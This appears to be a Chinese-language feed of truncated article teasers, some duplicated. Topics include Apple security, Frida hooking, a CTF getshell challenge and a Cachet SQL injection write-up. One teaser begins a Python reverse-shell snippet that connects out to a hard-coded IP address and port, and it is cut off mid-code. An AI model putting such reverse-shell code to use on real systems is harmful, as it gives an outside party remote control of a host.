出品｜虎嗅ESG组作者｜王静编辑｜袁加息头图｜视觉中国本文是#ESG进步观察#系列第042篇文章本次观察关键词：产品质量8月17日晚，一份9分钟的录音，再次将《中国好声音》节目组推上舆论风口。关...

众所周知，苹果一直在宣传自己的安全、隐私、可控。而且在过去，它也足够的安全。但世界上也没有绝对坚固的墙，大家也别因为这样，就彻底放松警惕。因为今天，它就翻车了。。。事情是这样的，一...

LocalConst.POST_MATHJAX = '' 最近琢磨frida Hook，好难，想走个捷径都不行，看了酒仙桥的文章《酒仙桥第六部队 hook从未如此丝滑》，其中提到了httpDecrypt ，t00ls，大概是看文章走马观花...

LocalConst.POST_MATHJAX = '' 最近琢磨frida Hook，好难，想走个捷径都不行，看了酒仙桥的文章《酒仙桥第六部队 hook从未如此丝滑》，其中提到了httpDecrypt ，t00ls，大概是看文章走马观花...

公众号关注 「奇妙的 Linux 世界」设为「星标」，每天带你玩转 Linux ！今天，分享一个神器：deskreen，它可以将将任何设备转换为计算机的辅助屏幕，目前已经在 Github 上标星 11.5K。Gith...

图片1：此博，发帖时间9月24日13点41分，粉丝量50万2图片2：此博，发帖时间9月24日13点42分，粉丝量31万3图片3：此博，发帖时间9月24日13点43分，粉丝量20万3图片4：此博，发帖时间9月24日14点1...

    python在linux下的反弹shell代码我相信很多人都见过： import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...

类似我一贯的做法，这次Real World CTF我出了一道实战性的题目，目标仍然是getshell。 我们以渗透测试的步骤来审视这道题目。 0x01 信息搜集 与我以往的题目不同的是，这次虽然我自己写了一部分...

事先声明：本次测试过程完全处于本地或授权环境，仅供学习与参考，不存在未授权测试过程。本文提到的漏洞《Cachet SQL注入漏洞（CVE-2021-39165）》已经修复，也请读者勿使用该漏洞进行未授权测...

事先声明：本次测试过程完全处于本地或授权环境，仅供学习与参考，不存在未授权测试过程。本文提到的漏洞《Cachet SQL注入漏洞（CVE-2021-39165）》已经修复，也请读者勿使用该漏洞进行未授权测...